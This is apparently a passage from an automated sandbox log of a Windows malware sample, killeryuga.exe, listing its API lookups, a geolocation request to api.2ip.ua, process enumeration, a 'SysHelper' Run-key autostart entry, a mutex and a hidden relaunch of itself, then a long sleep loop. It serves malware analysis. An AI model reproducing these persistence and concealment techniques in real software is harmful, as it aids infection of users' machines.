Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x750f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7502436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74e9c544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 15117810092 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Mutex Create mutex_name = {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x7a0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window Create window_name = LPCWSTRszTitle, class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Thread 0x7a8
861 0
»
Category Operation Information Success Count Logfile
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
